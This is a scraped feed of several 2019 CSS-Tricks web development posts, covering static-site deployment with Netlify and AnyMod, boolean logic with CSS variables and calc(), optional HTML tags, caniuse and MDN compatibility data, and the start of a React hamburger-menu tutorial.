Front End Web Development

Fast Static Sites with Netlify and AnyMod

CSS-Tricks - Thu, 09/12/2019 - 4:21am

In about 10 minutes, we'll set up a workflow that makes static sites dead simple.

You'll get the following:

  • Free HTTPS
  • Free or cheap hosting
  • Quick site builds
  • Editing with live reload
  • Easy edits even when you’ve forgotten everything in 6 months
Start: signups

We can get all this by using Netlify (really simple static hosting) along with AnyMod (100s of website sections).

Set up deploy pipeline

We’ll create a basic HTML file, track it with GitHub, and then auto-deploy with Netlify.

(If you prefer a manual setup, you can skip this step and instead deploy by dragging and dropping your site folder into Netlify.)

1. Create an empty repo in GitHub.

Go to https://github.com/new and name it netlify-anymod:

GitHub setup

2. Connect Netlify to your repo.

You will do this from the Netlify start screen.

Netlify setup

3. Create a folder on your computer and add a file named index.html.

You can run the following in your terminal to do this:

mkdir netlify-anymod
cd netlify-anymod
touch index.html

Now edit the index.html file to add some basic HTML structure:

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <meta http-equiv="X-UA-Compatible" content="ie=edge" />
  <title>Netlify & AnyMod | CSS Tricks</title>
</head>
<body>
  Hello, World!
</body>
</html>

4. Track it with git and deploy to GitHub

git init
git remote add origin https://github.com/tyrw/netlify-anymod.git
git add -A
git commit -m "Initial commit"
git push --set-upstream origin master

(Note: use your own repo URL for git remote add origin.)

Check your Netlify URL after a minute or so, and your site should be live!

Live site

Add section "mods"

Now that we have our deploy pipeline set up, we can build the page itself. We'll do this with ready-to-use modules ("mods") on AnyMod.

There are a lot to choose from, but we'll use mods from the Editorial theme:

Navigation

(View this mod)

Intro / Hero unit

(View this mod)

Form

(View this mod)

Image gallery

(View this mod)

Clone and add mods

Add these mods by clicking "Clone" for each one, then scrolling down and copying/pasting the installation code into the index.html file. Also copy and paste your project script at the top of the file.

Your index.html should now look something like this:

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <meta http-equiv="X-UA-Compatible" content="ie=edge" />
  <title>Netlify & AnyMod | CSS Tricks</title>
  <!-- AnyMod -->
  <script id="AnyMod-script">
    (function (m,o,d,u,l,a,r,i,z,e) {
      u[m]={Project:o,rq:[],Opts:r,ready:function(j){u[m].rq.push(j)}};
      function j(s){return encodeURIComponent(btoa(s))};
      z=l.getElementById(m+'-'+a);r=u.location;
      e=[d+'/page/'+o+'/'+j(r.pathname)+'/'+j(r.host)+'?t='+Date.now(),d];
      e.map(function(w){i=l.createElement(a);i.defer=1;i.src=w;z.parentNode.insertBefore(i,z);});
    })('AnyMod','82PEPN','https://cdn.anymod.com/v2',window,document,'script',{ toolkit: true, tips: true, priority: 3 });
  </script>
  <!-- /AnyMod -->
</head>
<body>
  <!-- Professional side nav -->
  <div id="anymod-mlrnbm"></div>
  <!-- Intro section -->
  <div id="anymod-ormard"></div>
  <!-- Contact form -->
  <div id="anymod-ralmam"></div>
  <!-- Card section -->
  <div id="anymod-balmaa"></div>
</body>
</html>

And the page is ready to go.

Now save and push to GitHub to deploy the site:

git add -A
git commit -m "Added mods"
git push origin

Wait a minute, and your site should be ready to use. Here is the demo page.

See Demo

Editing content

Now you can live edit the content and code for each mod. When viewing your own page (while also logged into AnyMod), you see a pencil on the right side:

AnyMod pencil

Click the pencil and choose a mod. Now try making some edits to the content (or code) and notice that it updates on the page automatically in real time.

AnyMod live edit

You can use this method to make edits now or in 6 months when you've forgotten how the project is set up.

Form

The form also works automatically. Try submitting a message on your own page; the response will be emailed to you right away.

Conclusion

You now have a great way to build fast, reliable, secure static sites.

Remember: with great power comes great responsibility.

The post Fast Static Sites with Netlify and AnyMod appeared first on CSS-Tricks.

Logical Operations with CSS Variables

CSS-Tricks - Wed, 09/11/2019 - 4:26am

Very often, while using switch variables (a variable that's either 0 or 1, a concept that's explained in greater detail in this post), I wish I could perform logical operations on them. We don't have functions like not(var(--i)) or and(var(--i), var(--k)) in CSS, but we can emulate these and more with arithmetic operations in a calc() function.

This article is going to show you what calc() formulas we need to use for each logical operation and explain how and why they are used, with a couple of use cases that led to the writing of this article.

How: the formulas

not

This is a pretty straightforward one: we subtract the switch variable (let's call it --j) from 1:

--notj: calc(1 - var(--j))

If --j is 0, then --notj is 1 (1 - 0). If --j is 1, then --notj is 0 (1 - 1).
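As a quick sketch of how --notj might get used (the .box rule and the opacity use here are just for illustration):

.box {
  --notj: calc(1 - var(--j, 0));
  /* fully visible when --j is 0, hidden when --j is 1 */
  opacity: var(--notj);
}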

and

Now, if you've ever taken electronics classes (particularly something like Programmed Logic Systems or Integrated Circuits), then you already know what formula we need to use here. But let's not jump straight into it.

The and of two operands is true if and only if both are true. The two operands in our case are two switch variables (let's call them --k and --i). Each of them can be either 0 or 1, independently of the other. This means we can be in one out of four possible scenarios:

  • --k: 0, --i: 0
  • --k: 0, --i: 1
  • --k: 1, --i: 0
  • --k: 1, --i: 1

The result of the and operation is 1 if both our switch variables are 1 and 0 otherwise. Looking at it the other way, this result is 0 if at least one of the two switch variables is 0.

Now you need to think of it this way: the result of what arithmetic operation is 0 if at least one of the two operands is 0? That's multiplication, as multiplying anything by 0 gives us 0!

So, our --and formula is:

--and: calc(var(--k)*var(--i))

Considering each of our four possible scenarios, we have:

  • for --k: 0, --i: 0, we have that --and is 0 (0*0)
  • for --k: 0, --i: 1, we have that --and is 0 (0*1)
  • for --k: 1, --i: 0, we have that --and is 0 (1*0)
  • for --k: 1, --i: 1, we have that --and is 1 (1*1)
nand

Since nand is not and, we need to replace the --j in the not formula with the formula for and:

--nand: calc(1 - var(--k)*var(--i))

For each of our four possible scenarios, we get:

  • for --k: 0, --i: 0, we have that --nand is 1 (1 - 0*0 = 1 - 0)
  • for --k: 0, --i: 1, we have that --nand is 1 (1 - 0*1 = 1 - 0)
  • for --k: 1, --i: 0, we have that --nand is 1 (1 - 1*0 = 1 - 0)
  • for --k: 1, --i: 1, we have that --nand is 0 (1 - 1*1 = 1 - 1)
or

The result of the or operation is 1 if at least one of our switch variables is 1 and 0 otherwise (if both of them are 0).

The first instinct here is to go for addition, but while that gives us 0 if both --k and --i are 0 and 1 if one is 0 and the other one is 1, it gives us 2 if both of them are 1. So that doesn't really work.

But we can use the good old De Morgan's laws, one of which states:

not (A or B) = (not A) and (not B)

This means the result of the or operation is the negation of the and operation between the negations of --k and --i. Putting this into CSS, we have:

--or: calc(1 - (1 - var(--k))*(1 - var(--i)))

For each scenario, we get:

  • for --k: 0, --i: 0, we have that --or is 0 (1 - (1 - 0)*(1 - 0) = 1 - 1*1 = 1 - 1)
  • for --k: 0, --i: 1, we have that --or is 1 (1 - (1 - 0)*(1 - 1) = 1 - 1*0 = 1 - 0)
  • for --k: 1, --i: 0, we have that --or is 1 (1 - (1 - 1)*(1 - 0) = 1 - 0*1 = 1 - 0)
  • for --k: 1, --i: 1, we have that --or is 1 (1 - (1 - 1)*(1 - 1) = 1 - 0*0 = 1 - 0)
nor

Since nor is not or, we have:

--nor: calc((1 - var(--k))*(1 - var(--i)))

For each of our four possible scenarios, we get:

  • for --k: 0, --i: 0, we have that --nor is 1 ((1 - 0)*(1 - 0) = 1*1)
  • for --k: 0, --i: 1, we have that --nor is 0 ((1 - 0)*(1 - 1) = 1*0)
  • for --k: 1, --i: 0, we have that --nor is 0 ((1 - 1)*(1 - 0) = 0*1)
  • for --k: 1, --i: 1, we have that --nor is 0 ((1 - 1)*(1 - 1) = 0*0)
xor

The result of the xor operation is 1 when one of the two operands is 1 and the other one is 0. This feels trickier at first, but, if we think this means the two operands need to be different for the result to be 1 (otherwise it's 0), we stumble upon the right arithmetic operation to use inside calc(): subtraction!

If --k and --i are equal, then subtracting --i from --k gives us 0. Otherwise, if we have --k: 0, --i: 1, the result of the same subtraction is -1; if we have --k: 1, --i: 0, the result is 1.

Close, but not quite! We get the result we want in three out of four scenarios, but we need to get 1, not -1 in the --k: 0, --i: 1 scenario.

However, one thing that -1, 0 and 1 have in common is that multiplying them with themselves gives us their absolute value (which is 1 for both -1 and 1). So the actual solution is to multiply this difference with itself:

--xor: calc((var(--k) - var(--i))*(var(--k) - var(--i)))

Testing each of our four possible scenarios, we have:

  • for --k: 0, --i: 0, we have that --xor is 0 ((0 - 0)*(0 - 0) = 0*0)
  • for --k: 0, --i: 1, we have that --xor is 1 ((0 - 1)*(0 - 1) = -1*-1)
  • for --k: 1, --i: 0, we have that --xor is 1 ((1 - 0)*(1 - 0) = 1*1)
  • for --k: 1, --i: 1, we have that --xor is 0 ((1 - 1)*(1 - 1) = 0*0)
Why: Use cases

Let's see a couple of examples that make use of logical operations in CSS. Note that I won't detail other aspects of these demos as they're outside the scope of this particular article.

Hide disabled panel only on small screens

This is a use case I came across while working on an interactive demo that lets users control various parameters to change a visual result. For more knowledgeable users, there's also a panel of advanced controls that's disabled by default. It can, however, be enabled in order to get access to manually controlling even more parameters.

Since this demo is supposed to be responsive, the layout changes with the viewport. We also don't want things to get crammed on smaller screens if we can avoid it, so there's no point in showing the advanced controls if they're disabled and we're in the narrow screen case.

The screenshot collage below shows the results we get for each of the four possible scenarios.

Collage of the possible cases.

So let's see what this means in terms of CSS!

First off, on the <body>, we use a switch that goes from 0 in the narrow screen case to 1 in the wide screen case. We also change the flex-direction this way (if you want a more detailed explanation of how this works, check out my second article on DRY switching with CSS variables).

body {
  --k: var(--wide, 0);
  display: flex;
  flex-direction: var(--wide, column);

  @media (orientation: landscape) { --wide: 1 }
}

We then have a second switch on the advanced controls panel. This second switch is 0 if the checkbox is unchecked and 1 if the checkbox is :checked. With the help of this switch, we give our advanced controls panel a disabled look (via a filter chain) and we also disable it (via pointer-events). Here, not comes in handy, as we want to decrease the contrast and the opacity in the disabled case:

.advanced {
  --i: var(--enabled, 0);
  --noti: calc(1 - var(--i));
  filter: contrast(calc(1 - var(--noti)*.9)) opacity(calc(1 - var(--noti)*.7));
  pointer-events: var(--enabled, none);

  [id='toggle']:checked ~ & { --enabled: 1 }
}

We want the advanced controls panel to stay expanded if we're in the wide screen case (so if --k is 1), regardless of whether the checkbox is :checked or not, or if the checkbox is :checked (so if --i is 1), regardless of whether we're in the wide screen case or not.

This is precisely the or operation!

So we compute an --or variable:

.advanced {
  /* same as before */
  --or: calc(1 - (1 - var(--k))*(1 - var(--i)));
}

If this --or variable is 0, this means we're in the narrow screen case and our checkbox is unchecked, so we want to zero the height of the advanced controls panel and also its vertical margin:

.advanced {
  /* same as before */
  margin: calc(var(--or)*#{$mv}) 0;
  height: calc(var(--or)*#{$h});
}

This gives us the desired result (live demo).

Use the same formulas to position multiple faces of a 3D shape

This is a use case I came across while working on the personal project of CSS-ing the Johnson solids this summer.

Let's take a look at one of these shapes, for example, the gyroelongated pentagonal rotunda (J25), in order to see how logical operations are useful here.

The shape we want to get.

This shape is made up of a pentagonal rotunda without the big decagonal base and a decagonal antiprism without its top decagon. The interactive demo below shows how these two components can be built by folding their nets of faces into 3D and then joined to give us the shape we want.

See the Pen by thebabydino (@thebabydino) on CodePen.

As can be seen above, the faces are either a part of the antiprism or a part of the rotunda. This is where we introduce our first switch variable, --i. This is 0 for the faces that are a part of the antiprism and 1 for the faces that are a part of the rotunda. The antiprism faces have a class of .mid because we can add another rotunda to the other antiprism base and then the antiprism would be in the middle. The rotunda faces have a class of .cup because this part does look like a coffee cup... without a handle!

The rotunda looks like an upside-down cup without a handle.

.mid { --i: 0 }
.cup { --i: 1 }

Focusing only on the lateral faces, these can have a vertex pointing up or down. This is where we introduce our second switch variable, --k. This is 0 if they have a vertex pointing up (such faces have a .dir class) and 1 if they're reversed and have a vertex pointing down (these faces have a class of .rev).

.dir { --k: 0 }
.rev { --k: 1 }

The antiprism has 10 lateral faces (all triangles) pointing up, each attached to an edge of its decagonal base that's also a base for the compound shape. It also has 10 lateral faces (all triangles as well) pointing down, each attached to an edge of its other decagonal base (the one that's also the decagonal base of the rotunda and is therefore not a base for the compound shape).

The rotunda has 10 lateral faces pointing up, alternating triangles and pentagons, each attached to the decagonal base that's also a base for the antiprism (so it's not a base for the compound shape as well). It also has 5 lateral faces, all triangles, pointing down, each attached to an edge of its pentagonal base.

The interactive demo below allows us to better see each of these four groups of faces by highlighting only one at a time. You can use the arrows at the bottom to pick which group of faces gets highlighted. You can also enable the rotation around the y axis and change the shape's tilt.

See the Pen by thebabydino (@thebabydino) on CodePen.

As previously mentioned, the lateral faces can be either triangles or pentagons:

.s3gon { --p: 0 }
.s5gon { --p: 1 }

Since all of the lateral faces (.lat) of both the antiprism and the rotunda have one edge in common with one of the two base faces of each shape, we call these common edges the base edges of the lateral faces.

The interactive demo below highlights these edges, their end points and their midpoints, and allows viewing the shapes from various angles thanks to the auto-rotations around the y axis, which can be started/paused at any moment, and to the manual rotations around the x axis, which can be controlled via the sliders.

See the Pen by thebabydino (@thebabydino) on CodePen.

In order to make things easier for ourselves, we set the transform-origin of the .lat faces on the middle of their base edges (bottom horizontal edges).

Highlighting the base edges and their midpoints (live).

We also make sure we position these faces so that these midpoints sit dead in the middle of the scene element containing our entire 3D shape.

Having the transform-origin coincide with the midpoint of the base edge means that any rotation we perform on a face is going to happen around the midpoint of its base edge, as illustrated by the interactive demo below:

See the Pen by thebabydino (@thebabydino) on CodePen.

We place our lateral faces where we want them to be in four steps:

  1. We rotate them around their y axis such that their base edges are now parallel to their final positions. (This also rotates their local system of coordinates — the z axis of an element always points in the direction that element faces.)
  2. We translate them such that their base edges coincide with their final positions (along the edges of the base faces of the two components).
  3. If they need to have a vertex pointing down, we rotate them around their z axis by half a turn.
  4. We rotate them around their x axis into their final positions.

These steps are illustrated by the interactive demo below, where you can go through them and also rotate the entire shape (using the play/pause button for the y axis rotation and the slider for the x axis rotation).

See the Pen by thebabydino (@thebabydino) on CodePen.

The y axis rotation value is based mostly on the face indices and less on our switch variables, though it depends on these as well.

The structure is as follows:

- var n = 5; //- number of edges/ vertices of small base

section.scene
  //- 3D shape element
  .s3d
    //- the faces, each a 2D shape element (.s2d)
    //- lateral (.lat) antiprism (.mid) faces,
    //- first half pointing up (.dir), others pointing down (.rev),
    //- all of them being triangles (.s3gon)
    - for(var j = 0; j < 4*n; j++)
      .s2d.mid.lat.s3gon(class=j < 2*n ? 'dir' : 'rev')
    //- lateral (.lat) rotunda (.cup) faces that point up (.dir),
    //- both triangles (.s3gon) and pentagons (.s5gon)
    - for(var j = 0; j < n; j++)
      .s2d.cup.lat.s3gon.dir
      .s2d.cup.lat.s5gon.dir
    //- lateral (.lat) rotunda (.cup) faces that point down (.rev),
    //- all of them triangles (.s3gon)
    - for(var j = 0; j < n; j++)
      .s2d.cup.lat.s3gon.rev
    //- base faces,
    //- one for the antiprism (.mid),
    //- the other for the rotunda (.cup)
    .s2d.mid.base(class=`s${2*n}gon`)
    .s2d.cup.base(class=`s${n}gon`)

Which gives us the following HTML:

<section class="scene">
  <div class="s3d">
    <!-- LATERAL faces -->
    <div class="s2d mid lat s3gon dir"></div>
    <!-- 9 more identical faces, so we have 10 lateral antiprism faces pointing up -->
    <div class="s2d mid lat s3gon rev"></div>
    <!-- 9 more identical faces, so we have 10 lateral antiprism faces pointing down -->
    <div class="s2d cup lat s3gon dir"></div>
    <div class="s2d cup lat s5gon dir"></div>
    <!-- 4 more identical pairs, so we have 10 lateral rotunda faces pointing up -->
    <div class="s2d cup lat s3gon rev"></div>
    <!-- 4 more identical faces, so we have 5 lateral rotunda faces pointing down -->
    <!-- BASE faces -->
    <div class="s2d mid base s10gon"></div>
    <div class="s2d cup base s5gon"></div>
  </div>
</section>

This means faces 0... 9 are the 10 lateral antiprism faces pointing up, faces 10... 19 are the 10 lateral antiprism faces pointing down, faces 20... 29 are the 10 lateral rotunda faces pointing up and faces 30... 34 are the 5 lateral rotunda faces pointing down.

So what we do here is set an index --idx on the lateral faces.

$n: 5; // number of edges/ vertices of small base

.lat {
  @for $i from 0 to 2*$n {
    &:nth-child(#{2*$n}n + #{$i + 1}) { --idx: #{$i} }
  }
}

This index starts at 0 for each group of faces, which means the indices for faces 0... 9, 10... 19 and 20... 29 go from 0 through 9, while the indices for faces 30... 34 go from 0 through 4. Great, but if we just multiply these indices by the base angle¹ of the common decagon to get the y axis rotation we want at this step:

--ay: calc(var(--idx)*#{$ba10gon});
transform: rotatey(var(--ay))

...then we get the following final result. I'm showing the final result here because it's a bit difficult to see what's wrong by looking at the intermediate result we get after only applying the rotation around the y axis.

See the Pen by thebabydino (@thebabydino) on CodePen.

This is... not quite what we were going for!

So let's see what problems the above result has and how to solve them with the help of our switch variables and boolean operations on them.

The first issue is that the lateral antiprism faces pointing up need to be offset by half of a regular decagon's base angle. This means adding or subtracting .5 from --idx before multiplying with the base angle, but only for these faces.

See the Pen by thebabydino (@thebabydino) on CodePen.

The faces we want to target are the faces for which both --i and --k are 0, so what we need here is to multiply the result of their nor by .5:

--nor: calc((1 - var(--k))*(1 - var(--i)));
--j: calc(var(--idx) + var(--nor)*.5);
--ay: calc(var(--j)*#{$ba10gon});
transform: rotatey(var(--ay));

The second issue is that the lateral rotunda faces pointing down are not distributed as they should be, such that each of them has a base edge in common with the base pentagon and the vertex opposing the base in common with the triangular rotunda faces pointing up. This means multiplying --idx by 2, but only for these faces.

See the Pen by thebabydino (@thebabydino) on CodePen.

What we're targeting now are the faces for which both --i and --k are 1 (so the faces for which the result of the and operation is 1), so what we need is to multiply --idx with 1 plus their and:

--and: calc(var(--k)*var(--i));
--nor: calc((1 - var(--k))*(1 - var(--i)));
--j: calc((1 + var(--and))*var(--idx) + var(--nor)*.5);
--ay: calc(var(--j)*#{$ba10gon});
transform: rotatey(var(--ay));

The next step is the translation, for which we use translate3d(). We don't move any of our faces left or right, so the value along the x axis is always 0. We do, however, move them vertically (along the y axis) and forward (along the z axis).

Vertically, we want the cup faces that will later get rotated to point down to have their base edge in the plane of the small (pentagonal) base of the cup (and of the compound shape). This means the faces for which --i is 1 and --k is 1 get moved up (negative direction) by half the total height of the compound shape (a total height which we have computed to be $h). So we need the and operation here.

// same as before
--and: calc(var(--i)*var(--k));
--y: calc(var(--and)*#{-.5*$h});
transform: rotatey(var(--ay)) translate3d(0, var(--y, 0), var(--z, 0));

We also want all the other cup faces as well as the antiprism faces that will eventually point down to have their base edge in the common plane between the cup and the antiprism. This means the faces for which --i is 1 and --k is 0 as well as the faces for which --i is 0 and --k is 1 get translated down (positive direction) by half the height of the compound shape and then back up (negative direction) by the height of the antiprism ($h-mid). And what do you know, this is the xor operation!

// same as before
--xor: calc((var(--k) - var(--i))*(var(--k) - var(--i)));
--and: calc(var(--i)*var(--k));
--y: calc(var(--xor)*#{.5*$h - $h-mid} - var(--and)*#{.5*$h});
transform: rotatey(var(--ay)) translate3d(0, var(--y, 0), var(--z, 0));

Finally, we want the antiprism faces that will remain pointing up to be in the bottom base plane of the compound shape (and of the antiprism). This means the faces for which --i is 0 and --k is 0 get translated down (positive direction) by half the total height of the compound shape. So what we use here is the nor operation!

// same as before
--nor: calc((1 - var(--k))*(1 - var(--i)));
--xor: calc((var(--k) - var(--i))*(var(--k) - var(--i)));
--and: calc(var(--i)*var(--k));
--y: calc(var(--nor)*#{.5*$h} + var(--xor)*#{.5*$h - $h-mid} - var(--and)*#{.5*$h});
transform: rotatey(var(--ay)) translate3d(0, var(--y, 0), var(--z, 0));

See the Pen by thebabydino (@thebabydino) on CodePen.

Along the z direction, we want to move the faces such that their base edges coincide with the edges of the base faces of the compound shape or the edges of the common base (which is not a face of the compound shape) shared by the two 3D components. For the top faces of the cup (which we later rotate to point down), the placement is on the edges of a pentagon, while for all the other faces of the compound shape, the placement is on the edges of a decagon.

This means the faces for which --i is 1 and --k is 1 get translated forward by the inradius of the pentagonal base while all the other faces get translated forward by the inradius of a decagonal base. So the operations we need here are and and nand!

// same as before
--and: calc(var(--i)*var(--k));
--nand: calc(1 - var(--and));
--z: calc(var(--and)*#{$ri5gon} + var(--nand)*#{$ri10gon});
transform: rotatey(var(--ay)) translate3d(0, var(--y, 0), var(--z, 0));

See the Pen by thebabydino (@thebabydino) on CodePen.

Next, we want to make all .rev (for which --k is 1) faces point down. This is pretty straightforward and doesn't require any logical operation; we just need to add a half-turn rotation around the z axis to the transform chain, but only for the faces for which --k is 1:

// same as before
--az: calc(var(--k)*.5turn);
transform: rotatey(var(--ay)) translate3d(0, var(--y), var(--z)) rotate(var(--az));

See the Pen by thebabydino (@thebabydino) on CodePen.

The pentagonal faces (for which --p is 1) are then all rotated around the x axis by a certain angle:

--ax: calc(var(--p)*#{$ax5});

In the case of the triangular faces (for which --p is 0, meaning we need to use --notp), we have a certain rotation angle for the faces of the antiprism ($ax3-mid), another angle for the faces of the rotunda that point up ($ax3-cup-dir) and yet another angle for the rotunda faces pointing down ($ax3-cup-rev).

The antiprism faces are those for which --i is 0, so we need to multiply their corresponding angle value with --noti here. The rotunda faces are those for which --i is 1, and out of these, the ones pointing up are those for which --k is 0 and the ones pointing down are those for which --k is 1.

--notk: calc(1 - var(--k));
--noti: calc(1 - var(--i));
--notp: calc(1 - var(--p));
--ax: calc(var(--notp)*(var(--noti)*#{$ax3-mid} + var(--i)*(var(--notk)*#{$ax3-cup-dir} + var(--k)*#{$ax3-cup-rev})) + var(--p)*#{$ax5});
transform: rotatey(var(--ay)) translate3d(0, var(--y), var(--z)) rotate(var(--az)) rotatex(var(--ax));

This gives us the final result!

See the Pen by thebabydino (@thebabydino) on CodePen.

¹ For any regular polygon (such as any of the faces of our shapes), the arc corresponding to one edge, as well as the angle between the circumradii to this edge's ends (our base angle), is a full circle (360°) divided by the number of edges. In the case of an equilateral triangle, the angle is 360°/3 = 120°. For a regular pentagon, the angle is 360°/5 = 72°. For a regular decagon, the angle is 360°/10 = 36°. ↪️


The post Logical Operations with CSS Variables appeared first on CSS-Tricks.

Some HTML is “Optional”

CSS-Tricks - Wed, 09/11/2019 - 4:22am

There is a variety of HTML that you can just leave out of the source HTML and it's still valid markup.

Doesn't this look weird?

<p>Paragraph one.
<p>Paragraph two.
<p>Paragraph three.

It does to me, but the closing </p> tags are optional. The browser will detect that it needs them, and the paragraphs will manifest correctly in the DOM anyway.

This probably happens to HTML you write and you don't even know it. For example...

<table>
  <tr>
    <td></td>
  </tr>
</table>

That looks perfectly fine to me, but the browser will inject a <tbody> in there around that <tr> for you. Optional in HTML, but the DOM will put it in anyway.
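In other words, after parsing, the DOM for that snippet effectively looks like this:

<table>
  <tbody>
    <tr>
      <td></td>
    </tr>
  </tbody>
</table>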

Heck, you don't really even need a <body> in the same fashion! Jens Oliver Meiert shares more:

<link rel=stylesheet href=default.css>

Some attributes are "optional" too in the sense that they have defaults you can leave out. For example, a <button> is automatically <button type="submit">.

Jens further argues that these omissions are almost optimizations, as they reduce file size and thus improve network speed.

Me, I don't like looking at HTML like that. Makes me nervous, since there are actual situations that screw up if you don't do it right. Not all file names can be left unquoted. Sometimes, leaving off closing tags means enveloping a sibling element in a way you didn't expect. I'd even sacrifice a tiny smidge of performance for a more resilient site. Sorta like how I know that * {} isn't a particularly efficient selector, but worrying about CSS selector performance is misplaced worry in most cases (the speed difference is negligible).
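A quick illustration of that unquoted file name trap (hypothetical file names): an unquoted attribute value ends at the first space, so the second line below requests a file called "site" and turns "styles.css" into a bogus attribute.

<link rel=stylesheet href=default.css>
<link rel=stylesheet href=site styles.css>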

I actually quite like JSX in how strict it forces you to write "HTML." That strictness helps code formatting (e.g. Prettier) too, as a bonus.

But hey, a perf gain is a perf gain, so I wouldn't say no to tooling that automatically does this stuff to compiled output. That's apparently something HTMLminifier can do.
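As a sketch of what that tooling looks like (assuming the html-minifier npm package and its removeOptionalTags option; check the docs for the exact API):

// a sketch using the html-minifier npm package
// (removeOptionalTags is the option that drops optional tags)
const { minify } = require('html-minifier');

const output = minify('<p>Paragraph one.</p><p>Paragraph two.</p>', {
  removeOptionalTags: true,
});
// output: '<p>Paragraph one.<p>Paragraph two.'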

The post Some HTML is “Optional” appeared first on CSS-Tricks.

Caniuse and MDN compatibility data collaboration

CSS-Tricks - Tue, 09/10/2019 - 9:51am

Second only to "silly GIFs," I'd guess screenshots of caniuse are the most common slide graphic at web conferences. It's become the ultimate source for looking at web compatibility data in the hearts and minds of web developers.

Can I use CSS filter in Firefox? Yes. Can I use the filter() function? No.

But of course, MDN has incredible web platform documentation that also includes compatibility data. So it's nice to see them collaborate. And not just theoretically — it's already happening.

Florian Scholz and Alexis Deveria:

Before we began our collaboration, the caniuse website only displayed results for features available in the caniuse database. Now all search results can include support tables for MDN compat data. This includes data types already found on caniuse, specifically the HTML, CSS, JavaScript, Web API, SVG, and HTTP categories. By adding MDN data, the caniuse support table count expands from roughly 500 to 10,500 tables! Developers’ caniuse queries on what’s supported where will now have significantly more results.

Massive upgrade, already live on the site. I absolutely love real collaboration like this when it actually happens. I remember back in 2012 when WebPlatform.org launched and every single major web company gave lip service that they were going to contribute and consolidate their documentation there. Sounded too good to be true. Launched before that work actually happened. Died unglamorously a few years later.

The caniuse database, I believe, is basically this 2MB JSON file on GitHub. We use that right here on CSS-Tricks. We pull it in and use the data in it to display our support tables, crediting caniuse while we do it.
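If you want to poke at that file yourself, here's a rough sketch of reading it directly (the URL and the data.json shape are assumptions based on the public Fyrd/caniuse repo, so double-check before relying on them):

// a sketch of reading the caniuse database directly
// (URL, feature key, and JSON shape assumed from the public repo)
fetch('https://raw.githubusercontent.com/Fyrd/caniuse/master/data.json')
  .then(res => res.json())
  .then(({ data }) => {
    const feature = data['css-backdrop-filter'];
    console.log(feature.title);              // the feature's display name
    console.log(feature.stats.chrome['76']); // e.g. "y" for supported
  });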

Here's backdrop-filter:

This browser support data is from Caniuse, which has more detail. A number indicates that browser supports the feature at that version and up.

Desktop:
  Chrome: 76, Opera: No, Firefox: No, IE: No, Edge: 17, Safari: 9*

Mobile / Tablet:
  iOS Safari: 9.0-9.2*, Opera Mobile: No, Opera Mini: No, Android: 76, Android Chrome: No, Android Firefox: No

It doesn't sound like the MDN data is going to make its way into that JSON, so I guess my big hope is that that dataset continues to be updated, or that if it is someday replaced, it is in a place that is similarly easy to access.

I totally get why they are just combining the data sources out of the gate, as MDN digs into individual features in a way that caniuse typically doesn't. For example, the individual values for justify-content are super complicated!

I imagine that kind of detail might require a deeper architectural change that wasn't right for a Version 1 integration.

Direct Link to Article

The post Caniuse and MDN compatibility data collaboration appeared first on CSS-Tricks.

Hamburger Menu with a Side of React Hooks and Styled Components

CSS-Tricks - Tue, 09/10/2019 - 4:35am

We all know what a hamburger menu is, right? When the pattern started making its way into web designs, it was both mocked and applauded for its minimalism that allows main menus to be tucked off screen, particularly on mobile where every pixel of space counts.

CSS-Tricks is all about double the meat.

Love ‘em or hate ‘em, hamburger menus are here and likely will be for some time to come. The problem is how to implement them. Sure, they look simple and straightforward, but they can be anything but. For example, should they be paired with a label? Are they more effective on the left or right side of the screen? How do we tackle closing those menus, whether by click or touch? Should the icon be an SVG, font, Unicode character, or pure CSS? What about a meatless option?

I wanted to build one of those but failed to find a simple solution. Most solutions are based on libraries, like reactjs-popup or react-burger-menu. They are great, but for more complex solutions. What about the core use case of a three-line menu that simply slides a panel out from the side of the screen when it’s clicked, then slides the panel back in when it’s clicked again?

I decided to build my own simple hamburger with sidebar. No pickles, onions or ketchup. Just meat, bun, and a side of menu items.

Are you ready to create it with me?

View on CodePen
View on GitHub

Here’s what we’re making

See the Pen
Burger menu with React hooks and styled-components
by Maks Akymenko (@maximakymenko)
on CodePen.

We’re using React for this tutorial because it seems like a good use case for it: we get a reusable component and a set of hooks we can extend to handle the click functionality.

Spin up a new React project

Let’s spin up a new project using create-react-app, change to that folder directory and add styled-components to style the UI:

npx create-react-app your-project-name
cd your-project-name
yarn add styled-components

Add basic styles

Open the newly created project in your favorite code editor and start adding basic styles using styled-components. In your src directory, create a file called global.js. It will contain styles for the whole app. You can write your own or just copy what I ended up doing:

// global.js
import { createGlobalStyle } from 'styled-components';

export const GlobalStyles = createGlobalStyle`
  html, body {
    margin: 0;
    padding: 0;
  }

  *, *::after, *::before {
    box-sizing: border-box;
  }

  body {
    align-items: center;
    background: #0D0C1D;
    color: #EFFFFA;
    display: flex;
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
    height: 100vh;
    justify-content: center;
    text-rendering: optimizeLegibility;
  }
`

This is only a part of global styles, the rest of it you can find here.

The createGlobalStyle function is generally used for creating global styles that are exposed to the whole app. We’ll import it so we have access to these styles as we go.

The next step is to add a theme file that holds all our variables. Create a theme.js file in the src directory and add following:

// theme.js
export const theme = {
  primaryDark: '#0D0C1D',
  primaryLight: '#EFFFFA',
  primaryHover: '#343078',
  mobile: '576px',
}

Add layout, menu and hamburger components 🍔

Go to your App.js file. We’re going to wipe everything out of there and create the main template for our app. Here’s what I did. You can certainly create your own.

// App.js
import React from 'react';
import { ThemeProvider } from 'styled-components';
import { GlobalStyles } from './global';
import { theme } from './theme';

function App() {
  return (
    <ThemeProvider theme={theme}>
      <>
        <GlobalStyles />
        <div>
          <h1>Hello. This is burger menu tutorial</h1>
          <img src="https://image.flaticon.com/icons/svg/2016/2016012.svg" alt="burger icon" />
          <small>Icon made by Freepik from www.flaticon.com</small>
        </div>
      </>
    </ThemeProvider>
  );
}

export default App;

Don’t forget to add the line with the small tag. That’s how we credit flaticon.com authors for the provided icon.

Here’s what we’ve got up to this point:

Let me explain a little bit. We imported ThemeProvider, which is a wrapper component that uses the Context API behind the scenes to make our theme variables available to the whole component tree.

We also imported our GlobalStyles and passed them as a component to our app, which means that our application now has access to all global styles. As you can see, our GlobalStyles component is inside ThemeProvider which means we can already make some minor changes in it.

